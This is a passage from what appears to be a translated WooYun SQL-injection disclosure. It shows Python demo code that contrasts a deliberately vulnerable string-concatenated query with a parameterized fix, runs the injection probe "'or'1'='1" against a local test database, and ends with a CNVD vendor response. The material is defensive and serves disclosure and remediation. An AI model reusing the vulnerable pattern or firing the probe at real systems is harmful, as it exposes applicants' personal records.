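    sql = "SELECT name FROM applicants WHERE sfzh = '" + sfzh + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, sfzh: str) -> list:
    """Bind variable: the value is sent as data, never parsed as SQL."""
    sql = "SELECT name FROM applicants WHERE sfzh = :sfzh"
    return [row[0] for row in conn.execute(sql, {"sfzh": sfzh})]


def looks_like_id_number(value: str) -> bool:
    """Allow-list check for an 18-character ID number (17 digits + digit/X).

    Defence in depth only: the bind variable is what actually stops the
    injection; this just rejects junk before it reaches the database.
    """
    return bool(re.fullmatch(r"\d{17}[\dXx]", value))


if __name__ == "__main__":
    conn = make_db()
    probe = "'or'1'='1"
    print("vulnerable:", lookup_vulnerable(conn, probe))   # every row
    print("safe:      ", lookup_safe(conn, probe))         # nothing
    print("format ok: ", looks_like_id_number(probe))      # False
```

In the ASP.NET application itself the same change is an OracleParameter bound to a :sfzh (or :zjhm) placeholder on the OracleCommand instead of string concatenation; the query text then never changes with user input, which is also what makes the DBMS_PIPE delay payload inert.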

Copyright notice: when reposting, please credit 默之@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-10-16 08:55

Vendor reply:

CNVD confirms the described situation; it has been forwarded through CNCERT to the Henan branch center, which will coordinate handling with the website's operating unit.

Latest status:

None yet